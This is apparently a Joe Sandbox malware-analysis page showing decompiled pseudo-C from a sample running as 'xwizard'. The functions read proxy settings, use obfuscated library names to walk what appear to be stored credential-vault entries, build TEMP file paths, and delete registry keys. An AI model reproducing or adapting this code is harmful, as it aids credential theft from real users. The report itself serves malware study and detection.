Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _assert
String ID: HjB
API String ID: 1222420520-2248713979
Opcode ID: f62c3d4576d8ad505b0a81f0fa83231c5cc89cc9aafe5267dd7225276671c9f6
Instruction ID: a3441135aa71a6079429eef520cd0e1a6c464effaa05f67e07f9da83f6d0b88a
Opcode Fuzzy Hash: f62c3d4576d8ad505b0a81f0fa83231c5cc89cc9aafe5267dd7225276671c9f6
Instruction Fuzzy Hash: 222288716083A18FC724CF29D49052ABBE1BFC9314F448A6EF9E597356D234EA05CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00408417, Relevance: 49.3, APIs: 13, Strings: 15, Instructions: 294
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E00408417(void* __edx, void* __eflags, int _a8, void* _a11, void* _a12, void* _a13, void* _a14, void* _a15, void* _a16, void _a17, void* _a24, intOrPtr _a28, void* _a36, char _a48, char _a56, void _a60, void _a64, intOrPtr _a80, char _a100, char _a101, char _a102, char _a103, void _a104, char _a105, void _a112, void _a128, void* _a140, char _a172, char _a204, char _a236) {
				void _v0;
				void _v4;
				void _v8;
				void* _v12;
				void* _v16;
				void* _v24;
				void* _v28;
				void* _v32;
				void _v40;
				void* _v44;
				void* _v48;
				CHAR* _t121;
				void* _t124;
				struct HINSTANCE__* _t125;
				_Unknown_base(*)()* _t126;
				intOrPtr _t127;
				struct HINSTANCE__* _t128;
				_Unknown_base(*)()* _t129;
				void* _t130;
				void* _t138;
				void* _t142;
				void* _t146;
				void* _t147;
				void* _t151;
				void* _t152;
				void* _t156;
				intOrPtr _t160;
				int _t162;
				void* _t165;
				void* _t167;
				void* _t180;
				void* _t184;
				void* _t185;
				void* _t189;
				intOrPtr* _t198;
				intOrPtr _t199;
				void* _t200;
				void _t201;
				intOrPtr _t202;
				void _t203;
				void* _t214;
				CHAR* _t215;
				CHAR* _t232;
				_Unknown_base(*)()* _t234;
				void* _t236;
				void* _t237;
				void* _t238;
				void* _t242;
				void* _t243;
				struct HINSTANCE__* _t245;
				void* _t246;
				void* _t248;
				void* _t249;
				void* _t250;
				intOrPtr* _t255;

				_t214 = __edx;
				_t250 = _t249 - E0041F3F0(0x110c);
				_t121 = E004081AA("U4R-55sTsdR");
				_t198 = GetProcAddress(LoadLibraryA("winhttp.dll"), _t121);
				_v16 = "U4R-55sEd590WfZ_W0u0i";
				_t124 = E004081AA(_t215);
				_v16 = "winhttp.dll";
				_t125 = LoadLibraryA(_t215);
				_v12 = _t124;
				_v16 = _t125;
				_t126 = GetProcAddress(_t245, _t232);
				_push(_t214);
				_push(_t214);
				if(_t198 != 0 && _t126 != 0) {
					memcpy( &_a104, L"InternetProxy", 7 << 2);
					_t204 = 0;
					_v0 = 0;
					_v4 = 0;
					_v8 = 0;
					_v12 = 1;
					_v16 =  &_a104;
					_a28 = 0;
					_t160 =  *_t198();
					_t250 = _t250 + 0xc - 0x14;
					_t202 = _t160;
					if(_t160 != 0) {
						_t214 =  &_a48;
						_t162 = memset( &_a60, _a8, 6 << 2);
						_a60 = 1;
						_a64 = 3;
						_a80 = 1;
						memset(_t214, _t162, 3 << 2);
						_t165 = memcpy( &_a112, L"http://www.yandex.com", 0xb << 2);
						_t255 = _t250 + 0x24;
						_t204 = 0;
						_v28 = _t165;
						_v24 = _t214;
						 *_t255 = _t202;
						_v32 =  &_a112;
						_t167 = _v0();
						_t250 = _t255 - 0x10;
						if(_t167 != 0) {
							memcpy( &_a17, "socks=", 7);
							_t250 = _t250 + 0xc;
							_t204 = 0;
							_v40 = _t203;
							_v44 = _t248;
							_v48 =  &_a17;
							 *_t250 =  &_a204;
							if(E00408306(0, _t261) != 0) {
								 *_t250 = 0x8c;
								_t180 = malloc(??);
								_t242 = _t180;
								_v44 = 0x40;
								_v48 = _t248;
								 *_t250 = _t180 + 4;
								E00412548();
								 *_t242 = 0;
								 *_t250 = _t203;
								 *((intOrPtr*)(_t242 + 0x44)) = E00412666(0);
								_t184 =  *0x42b304; // 0x0
								 *0x42b304 = _t242;
								 *(_t242 + 0x88) = _t184;
								 *_t250 = 0x8c;
								_t185 = malloc(??);
								_t243 = _t185;
								_v44 = 0x40;
								_v48 = _t248;
								 *_t250 = _t185 + 4;
								E00412548();
								 *_t243 = 2;
								 *_t250 = _t203;
								 *((intOrPtr*)(_t243 + 0x44)) = E00412666(0);
								_t189 =  *0x42b304; // 0x0
								 *0x42b304 = _t243;
								 *(_t243 + 0x88) = _t189;
								_v44 = 4;
								_v48 = 0x422fa5;
								 *_t250 = 0x4223dc;
								E00412548();
							}
						}
					}
				}
				_t127 = E004081AA("U4R-55sEd5Xj90WfZPWR84n_W0PQ00dR5u6d0");
				_v16 = "winhttp.dll";
				_t199 = _t127;
				_t128 = LoadLibraryA(??);
				_v12 = _t199;
				_v16 = _t128;
				_t129 = GetProcAddress(_t204, ??);
				_push(_t199);
				_t234 = _t129;
				_push(_t199);
				if(_t129 != 0) {
					_t130 = malloc(0x10);
					_t200 = _t130;
					_v16 = _t130;
					_t129 =  *_t234();
					_t264 = _t129;
					_push(_t214);
					if(_t129 != 0) {
						_v12 = "%S";
						_t201 =  &_a56;
						_v16 = 0x1000;
						_t246 =  &_a172;
						_v8 =  *((intOrPtr*)(_t200 + 8));
						 *_t250 =  &_a236;
						E004127A8();
						_v12 = 0x1000;
						_v16 = 0x422f70;
						 *_t250 =  &_a236;
						E00412588();
						_v8 = _t201;
						_v12 = _t246;
						_a100 = 0x68;
						_a101 = 0x74;
						_v16 =  &_a100;
						_a102 = 0x74;
						_a103 = 0x70;
						_a104 = 0x3d;
						 *_t250 =  &_a236;
						_a105 = 0;
						_t138 = E00408306(_t204, _t264);
						_t265 = _t138;
						if(_t138 != 0) {
							 *_t250 = 0x8c;
							_t152 = malloc(??);
							_t238 = _t152;
							_v12 = 0x40;
							_v16 = _t246;
							 *_t250 = _t152 + 4;
							E00412548();
							 *_t238 = 3;
							 *_t250 = _t201;
							 *((intOrPtr*)(_t238 + 0x44)) = E00412666(_t204);
							_t156 =  *0x42b304; // 0x0
							 *0x42b304 = _t238;
							 *(_t238 + 0x88) = _t156;
							_v12 = 4;
							_v16 = 0x422fa5;
							 *_t250 = 0x4223dc;
							E00412548();
						}
						memcpy( &_a128, "socks=", 7);
						_t250 = _t250 + 0xc;
						_v8 = _t201;
						_v12 = _t246;
						_v16 =  &_a128;
						 *_t250 =  &_a236;
						_t129 = E00408306(0, _t265);
						if(_t129 != 0) {
							 *_t250 = 0x8c;
							_t142 = malloc(??);
							_t236 = _t142;
							_v12 = 0x40;
							_v16 = _t246;
							 *_t250 = _t142 + 4;
							E00412548();
							 *_t236 = 2;
							 *_t250 = _t201;
							 *((intOrPtr*)(_t236 + 0x44)) = E00412666(0);
							_t146 =  *0x42b304; // 0x0
							 *0x42b304 = _t236;
							 *(_t236 + 0x88) = _t146;
							 *_t250 = 0x8c;
							_t147 = malloc(??);
							_t237 = _t147;
							_v12 = 0x40;
							_v16 = _t246;
							 *_t250 = _t147 + 4;
							E00412548();
							 *_t237 = 0;
							 *_t250 = _t201;
							 *((intOrPtr*)(_t237 + 0x44)) = E00412666(0);
							_t151 =  *0x42b304; // 0x0
							 *0x42b304 = _t237;
							 *(_t237 + 0x88) = _t151;
							_v12 = 4;
							_v16 = 0x422fa5;
							 *_t250 = 0x4223dc;
							_t129 = E00412548();
						}
					}
				}
				return _t129;
			}

APIs

LoadLibraryA.KERNEL32(?,?,?,?,0040914E), ref: 0040843C
GetProcAddress.KERNEL32(?,?), ref: 00408449
LoadLibraryA.KERNEL32(?,?,?,?,?,0040914E), ref: 00408467
GetProcAddress.KERNEL32 ref: 00408474
malloc.MSVCRT ref: 004085DE
malloc.MSVCRT ref: 00408678
malloc.MSVCRT ref: 004086BF
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040914E), ref: 00408730
GetProcAddress.KERNEL32 ref: 0040873D
malloc.MSVCRT ref: 00408755
malloc.MSVCRT ref: 00408802
malloc.MSVCRT ref: 004088A2
malloc.MSVCRT ref: 004088E9

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

Strings

http://www.yandex.com, xrefs: 004084E8
t, xrefs: 004087CB
t, xrefs: 004087DB
t, xrefs: 004085B7
socks=, xrefs: 0040863E, 00408865
t, xrefs: 004085A7
=, xrefs: 004085C1
@, xrefs: 004088F3
h, xrefs: 004087C6
p, xrefs: 004087E0
p, xrefs: 004085BC
InternetProxy, xrefs: 00408491
=, xrefs: 004087E5
h, xrefs: 004085A2
p/B, xrefs: 004087AA

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: malloc$AddressLibraryLoadProc$_vsnprintf
String ID: =$=$@$InternetProxy$h$h$http://www.yandex.com$p$p$p/B$socks=$t$t$t$t
API String ID: 3272051020-3390938176
Opcode ID: 5ae4fd168ad160b687ec016b66311f032f2127d997e6a72b6d5e7ab802d206c0
Instruction ID: 129794d27e18b5d836c16bc2de0120feea3297db44a07732c008f05b0d4f5d07
Opcode Fuzzy Hash: 5ae4fd168ad160b687ec016b66311f032f2127d997e6a72b6d5e7ab802d206c0
Instruction Fuzzy Hash: 09D1F5B0508740AFD710EF25C68479ABBF0BF84744F418C2EE5C897351EBB99989CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC15, Relevance: 27.2, APIs: 6, Strings: 12, Instructions: 218COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041AC2A
malloc.MSVCRT ref: 0041AC8B
free.MSVCRT ref: 0041AC9F

Part of subcall function 00414FEF: realloc.MSVCRT ref: 00415034

free.MSVCRT ref: 0041AF2C
free.MSVCRT ref: 0041AF38
free.MSVCRT ref: 0041AF8A

Strings

I, xrefs: 0041AE2D
N, xrefs: 0041ADF4
D, xrefs: 0041AE37
R, xrefs: 0041AE3C
P, xrefs: 0041ADD0
), xrefs: 0041ACB5
T, xrefs: 0041AED0
I, xrefs: 0041AEAC
D, xrefs: 0041AEBE
G, xrefs: 0041ADFD
A, xrefs: 0041AEC3
H, xrefs: 0041AE32

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: free$malloc$realloc
String ID: )$A$D$D$G$H$I$I$N$P$R$T
API String ID: 10190057-4026286603
Opcode ID: f7e0d66e6706360943002546ce2ae5a522dee07f1adf161bc0e3ce1e523a7a0e
Instruction ID: 7b50295ee95f3483ab7dff93a2a89c17451d79e52031df4d4eaf42e24e8d509c
Opcode Fuzzy Hash: f7e0d66e6706360943002546ce2ae5a522dee07f1adf161bc0e3ce1e523a7a0e
Instruction Fuzzy Hash: 14A1D27110D3809ED311DB69C48438FFFE1ABA6308F44895EE5C89B382D7B99989CB57

Uniqueness

Uniqueness Score: -1.00%

Function 0040DCE9, Relevance: 24.4, APIs: 16, Instructions: 395
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0040DCE9(struct HINSTANCE__* __edx, int* _a4) {
				char _v340;
				char _v344;
				char _v568;
				char _v824;
				char _v852;
				char _v856;
				void _v1068;
				char _v1080;
				void _v1084;
				int _v1092;
				int _v1096;
				int _v1100;
				int _v1104;
				int _v1108;
				char _v1112;
				int _v1116;
				int _v1120;
				_Unknown_base(*)()* _v1124;
				_Unknown_base(*)()* _v1128;
				int _v1132;
				signed int _v1136;
				int _v1144;
				int _v1148;
				char* _v1152;
				signed int _v1160;
				char _v1164;
				char _v1168;
				int* _v1172;
				int _v1176;
				int* _v1180;
				int* _v1184;
				int _v1188;
				int _v1192;
				intOrPtr _v1196;
				intOrPtr _v1200;
				signed char _v1204;
				int _v1208;
				int _v1212;
				int _v1216;
				int _v1220;
				char* _v1224;
				int _v1228;
				char* _v1232;
				int _v1236;
				int _t213;
				_Unknown_base(*)()* _t217;
				int _t218;
				_Unknown_base(*)()* _t221;
				int _t222;
				_Unknown_base(*)()* _t223;
				int _t224;
				signed int _t225;
				int _t231;
				void* _t239;
				void* _t243;
				void* _t263;
				char* _t264;
				int _t271;
				void* _t295;
				int _t296;
				signed char _t303;
				CHAR* _t306;
				intOrPtr* _t307;
				int _t308;
				struct HINSTANCE__* _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed char _t317;
				int* _t319;
				int _t321;
				intOrPtr* _t328;
				signed char _t329;
				int _t330;
				signed char _t331;
				struct HINSTANCE__* _t334;
				struct HINSTANCE__* _t335;
				char* _t336;
				char* _t337;
				int _t338;
				void* _t339;
				char** _t342;

				_t313 = __edx;
				_v1108 = 0;
				 *(memcpy( &_v1084, 0x4228a0, 4 << 2)) = 0;
				_v1104 = 0;
				_v1100 = 0;
				_v1096 = 0;
				_v1092 = 0;
				memcpy( &_v1068, 0x4228b0, 4 << 2);
				_t342 = _t339 - 0x48c + 0x18;
				_t334 = LoadLibraryA(E004081AA("2CQi5Yi4.Sii"));
				_t213 = 0;
				_push(_t306);
				if(_t334 == 0) {
					L38:
					return _t213;
				}
				_t328 = GetProcAddress(_t334, E004081AA("zCQi5TsdRzCQi5"));
				_v1180 = "zCQi5PiW6dzCQi5";
				_t217 = GetProcAddress(_t334, E004081AA(_t313));
				_v1180 = "zCQi5jRQld0C5dX5dl6";
				_v1128 = _t217;
				_t218 = E004081AA(0);
				_v1180 = _t334;
				_v1176 = _t218;
				_t307 = GetProcAddress(0, _t313);
				_v1180 = "zCQi5Ed5X5dl";
				_t221 = GetProcAddress(_t334, E004081AA(_t306));
				_v1180 = "zCQi5Ed5X5dl";
				_v1124 = _t221;
				_t222 = E004081AA(_t335);
				_v1180 = _t334;
				_v1176 = _t222;
				_t223 = GetProcAddress(_t335, _t306);
				_v1180 = "zCQi5_0dd";
				_v1120 = _t223;
				_t224 = E004081AA(_t313);
				_v1180 = _t334;
				_v1176 = _t224;
				_t225 = GetProcAddress(_t313, ??);
				_push(0);
				_push(0);
				_t314 = _t313 & 0xffffff00 | _t328 == 0x00000000;
				_v1136 = _t225;
				_t315 = _t314 & 0xffffff00 | _v1128 == 0x00000000;
				_t316 = _t315 & 0xffffff00 | _v1124 == 0x00000000;
				_t317 = _t316 & 0xffffff00 | _v1120 == 0x00000000;
				if((_t225 & 0xffffff00 | _t307 == 0x00000000 | _t314 | _t315 | _t316 | _t317) != 0 || _v1136 == 0) {
					L3:
					_t308 = 0;
					goto L33;
				} else {
					_v1176 = 0;
					_v1172 =  &_v1104;
					_v1180 =  &_v1084;
					_t239 =  *_t328();
					_t342 = _t342 - 0xc;
					if(_t239 != 0) {
						goto L3;
					}
					_v1188 = 0x200;
					_v1180 =  &_v1108;
					_v1184 =  &_v1112;
					_v1192 = _v1116;
					_t243 =  *_t307();
					_t342 = _t342 - 0x10;
					if(_t243 != 0 || _v1128 == 0) {
						goto L3;
					} else {
						if(E004132E6(0, _t317) != 0xa) {
							if(E004132E6(0, _t317) == 0xc || E004132E6(0, _t317) == 0xb || E004132E6(0, _t317) == 0xe || E004132E6(0, _t317) == 0xd || E004132E6(0, _t317) == 0xf) {
								goto L8;
							} else {
								_v1160 = 0;
								_t308 = 0;
								while(_v1160 < _v1128) {
									_v1200 = 0x10;
									_t317 = _v1124 + _v1160 * 0x34;
									_v1204 =  &_v1096;
									_v1208 = _t317;
									_t331 = _t317;
									if(E004129C0() == 0) {
										WideCharToMultiByte(0, 0,  *(_t331 + 0x10), 0xffffffff,  &_v1080, 0x100, 0, 0);
										WideCharToMultiByte(0, 0,  *((intOrPtr*)(_t331 + 0x14)) + 0x20, 0xffffffff,  &_v824, 0x100, 0, 0);
										_t337 =  &_v568;
										WideCharToMultiByte(0, 0,  *((intOrPtr*)(_t331 + 0x18)) + 0x20, 0xffffffff, _t337, 0x100, 0, 0);
										_v1188 = 0;
										_v1192 = 0;
										_v1120 = 0;
										_v1184 =  &_v1120;
										_v1196 =  *((intOrPtr*)(_t331 + 0x18));
										_v1204 = _t331;
										_v1200 =  *((intOrPtr*)(_t331 + 0x14));
										_v1208 = _v1132;
										_t295 = _v1152();
										_t342 = _t342 - 0xffffffffffffffc4;
										if(_t295 == 0) {
											_t321 =  &_v340;
											_v1208 = 0;
											_v1212 = 0;
											_v1216 = 0x100;
											_v1220 = _t321;
											_v1224 = 0xffffffff;
											_v1232 = 0;
											_v1236 = 0;
											_v1176 = _t321;
											_v1228 =  *((intOrPtr*)(_v1148 + 0x1c)) + 0x20;
											WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
											_t342 = _t342 - 0x20;
											_t317 = _v1176;
											_v1220 = _t337;
											_t338 =  &_v1144;
											_v1228 = 2;
											_v1232 = 0x4239a1;
											_v1224 =  &_v852;
											_v1144 = 0;
											_v1216 = _t317;
											_v1236 = _t338;
											_t303 = E00412755( &_v852);
											_t331 = _t303;
											if(_t303 != 0xffffffff) {
												_v1224 = _t303;
												_v1232 = _t308;
												_v1220 = 1;
												_v1228 = _t338;
												_t308 = _t308 + _t331;
												_v1236 =  &_v1164;
												_v1164 = E00412ABF(0);
											}
										}
										_t296 = _v1148;
										if(_t296 != 0) {
											_v1236 = _t296;
											_v1192();
											_push(_t331);
										}
									}
									_v1188 =  &(1[_v1188]);
								}
								L33:
								_t231 = _v1096;
								if(_t231 != 0) {
									_v1180 = _t231;
									_v1136();
									_push(0);
								}
								if(_v1104 != 0) {
									_v1180 =  &_v1104;
									_v1128();
									_push(_t317);
								}
								_push(FreeLibrary(_t334));
								 *_a4 = _t308;
								_t213 = _v1108;
								goto L38;
							}
						}
						L8:
						_v1160 = 0;
						_t308 = 0;
						while(_v1160 < _v1128) {
							_v1200 = 0x10;
							_t317 = _v1124 + _v1160 * 0x38;
							_v1204 =  &_v1096;
							_v1208 = _t317;
							_t329 = _t317;
							if(E004129C0() == 0) {
								WideCharToMultiByte(0, 0,  *(_t329 + 0x10), 0xffffffff,  &_v1080, 0x100, 0, 0);
								WideCharToMultiByte(0, 0,  *((intOrPtr*)(_t329 + 0x14)) + 0x20, 0xffffffff,  &_v824, 0x100, 0, 0);
								_t336 =  &_v568;
								WideCharToMultiByte(0, 0,  *((intOrPtr*)(_t329 + 0x18)) + 0x20, 0xffffffff, _t336, 0x100, 0, 0);
								_v1184 = 0;
								_v1188 = 0;
								_v1192 = 0;
								_v1120 = 0;
								_v1180 =  &_v1120;
								_v1196 =  *((intOrPtr*)(_t329 + 0x18));
								_v1204 = _t329;
								_v1200 =  *((intOrPtr*)(_t329 + 0x14));
								_v1208 = _v1132;
								_t263 = _v1148();
								_t342 = _t342 - 0xffffffffffffffc0;
								if(_t263 == 0) {
									_t319 =  &_v344;
									_v1212 = 0;
									_v1216 = 0;
									_v1220 = 0x100;
									_v1224 = _t319;
									_v1228 = 0xffffffff;
									_v1236 = 0;
									 *_t342 = 0;
									_v1184 = _t319;
									_v1232 = _v1152[0x1c] + 0x20;
									WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
									_t342 = _t342 - 0x20;
									_t317 = _v1184;
									_v1224 = _t336;
									_t336 =  &_v1148;
									_v1232 = 2;
									_v1236 = 0x4239a1;
									_v1228 =  &_v856;
									_v1148 = 0;
									_v1220 = _t317;
									 *_t342 = _t336;
									_t271 = E00412755( &_v856);
									_t330 = _t271;
									if(_t271 != 0xffffffff) {
										_v1228 = _t271;
										_v1236 = _t308;
										_v1224 = 1;
										_v1232 = _t336;
										_t308 = _t308 + _t330;
										 *_t342 =  &_v1168;
										_v1168 = E00412ABF(0);
									}
								}
								_t264 = _v1152;
								if(_t264 != 0) {
									 *_t342 = _t264;
									_v1196();
									_push(_t336);
								}
							}
							_v1192 =  &(1[_v1192]);
						}
						goto L33;
					}
				}
			}

APIs

LoadLibraryA.KERNEL32 ref: 0040DD57
GetProcAddress.KERNEL32(?), ref: 0040DD7C
GetProcAddress.KERNEL32 ref: 0040DD98
GetProcAddress.KERNEL32 ref: 0040DDB6
GetProcAddress.KERNEL32(?,?), ref: 0040DDD2
GetProcAddress.KERNEL32 ref: 0040DDF0
GetProcAddress.KERNEL32 ref: 0040DE0E
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E397

Part of subcall function 004132E6: GetVersionExA.KERNEL32 ref: 00413325
Part of subcall function 004132E6: GetSystemMetrics.USER32 ref: 004133FA

WideCharToMultiByte.KERNEL32 ref: 0040DF74
WideCharToMultiByte.KERNEL32 ref: 0040DFC0
WideCharToMultiByte.KERNEL32 ref: 0040E00C
WideCharToMultiByte.KERNEL32 ref: 0040E0B0
WideCharToMultiByte.KERNEL32 ref: 0040E1B4
WideCharToMultiByte.KERNEL32 ref: 0040E200
WideCharToMultiByte.KERNEL32 ref: 0040E24C
WideCharToMultiByte.KERNEL32 ref: 0040E2E8

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AddressProc$Library$FreeLoadMetricsSystemVersion
String ID:
API String ID: 4051271034-0
Opcode ID: 87aafaf84040a22bc4a574d69e3875252030c0c31ccf32c7b5f1b702cec560f4
Instruction ID: 0411f2c87eaa10a6bc819440aee1928311a11f64f3fd3897648e7812cf6e01f9
Opcode Fuzzy Hash: 87aafaf84040a22bc4a574d69e3875252030c0c31ccf32c7b5f1b702cec560f4
Instruction Fuzzy Hash: 6802ADB04087419FD310EF6AC58875BBBE4BF84358F108D2EF4948B291E7B9D5898F96

Uniqueness

Uniqueness Score: -1.00%

Function 00401421, Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 101COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00401428
getenv.MSVCRT ref: 00401559

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

getenv.MSVCRT ref: 0040159B

Strings

%, xrefs: 0040151E
%, xrefs: 00401538
%s\%s.%s, xrefs: 0040145A
\, xrefs: 00401530
s, xrefs: 00401540
TEMP, xrefs: 00401550
s, xrefs: 00401528

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: getenv$_vsnprintfmalloc
String ID: %$%$%s\%s.%s$TEMP$\$s$s
API String ID: 3160696619-3075679649
Opcode ID: ca09603a6fb3c31e46f94ea190ba63cd36d7fdd7c598f72b2894dd74d252403c
Instruction ID: f04d716bfdf1a3b2f19b14ba05fef692e22545d8b3c1490e52eb58049ae1adaa
Opcode Fuzzy Hash: ca09603a6fb3c31e46f94ea190ba63cd36d7fdd7c598f72b2894dd74d252403c
Instruction Fuzzy Hash: 435196B040C385DEE720EF25D54879EBBE0BF84348F408D2EE5D887281E7B99588DB56

Uniqueness

Uniqueness Score: -1.00%

Function 00408042, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00408094
_wfopen.MSVCRT ref: 004080AE

Part of subcall function 00407FC3: fgetpos.MSVCRT ref: 00407FE9

fgetpos.MSVCRT ref: 004080F0
fsetpos.MSVCRT ref: 00408126
malloc.MSVCRT ref: 00408132
fread.MSVCRT ref: 00408152
realloc.MSVCRT ref: 00408168
fclose.MSVCRT ref: 00408174
fclose.MSVCRT ref: 00408185

Strings

d/B, xrefs: 004080A3

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: fclosefgetpos$ByteCharMultiWide_wfopenfreadfsetposmallocrealloc
String ID: d/B
API String ID: 1812338015-978428479
Opcode ID: 9089e06318853e29848d6abf22137532cc5c9e930021d096596f87134e90177b
Instruction ID: cce78eb31c107fb340ace7c9921005f6624d878254cb06048c37cb8e28fe17a8
Opcode Fuzzy Hash: 9089e06318853e29848d6abf22137532cc5c9e930021d096596f87134e90177b
Instruction Fuzzy Hash: 6031B6B0509705ABD750AF26C68535EBBE4AF84348F01892EE8D89B281D778D54A8F4B

Uniqueness

Uniqueness Score: -1.00%

Function 0041086B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyA.ADVAPI32 ref: 004108D0
RegOpenKeyExA.ADVAPI32 ref: 00410900

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

RegEnumKeyExA.ADVAPI32 ref: 00410958
RegCloseKey.ADVAPI32 ref: 0041096B
RegDeleteKeyA.ADVAPI32(00000000), ref: 00410978

Strings

@, xrefs: 0041099A

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Delete$CloseEnumOpen_vsnprintf
String ID: @
API String ID: 3258335120-2766056989
Opcode ID: c5fee486713a1e3e413a08c522e5d7fe8b5e1595fa91894b84a89dceef684568
Instruction ID: 9d604c6237a7cde6d8c47273939e6e17ca47206dd9184e21b4ed585c08607efa
Opcode Fuzzy Hash: c5fee486713a1e3e413a08c522e5d7fe8b5e1595fa91894b84a89dceef684568
Instruction Fuzzy Hash: FB31D2F04087059EE710EF26C59839FFBE4AF84748F00891EE4D897251D3B985898F9B

Uniqueness

Uniqueness Score: -1.00%

Function 0041C87B, Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 427
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0041C87B(intOrPtr* _a4, signed int _a8, signed int _a12, signed int _a16, char* _a20, signed short _a24, signed int _a28, signed int _a32, signed int _a36, intOrPtr _a40) {
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v38;
				char _v42;
				char _v46;
				char _v47;
				unsigned short _v48;
				char _v49;
				char _v50;
				char _v52;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				void _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				char _v84;
				signed short _v86;
				signed short _v88;
				signed int _v96;
				signed short _v100;
				signed int _v104;
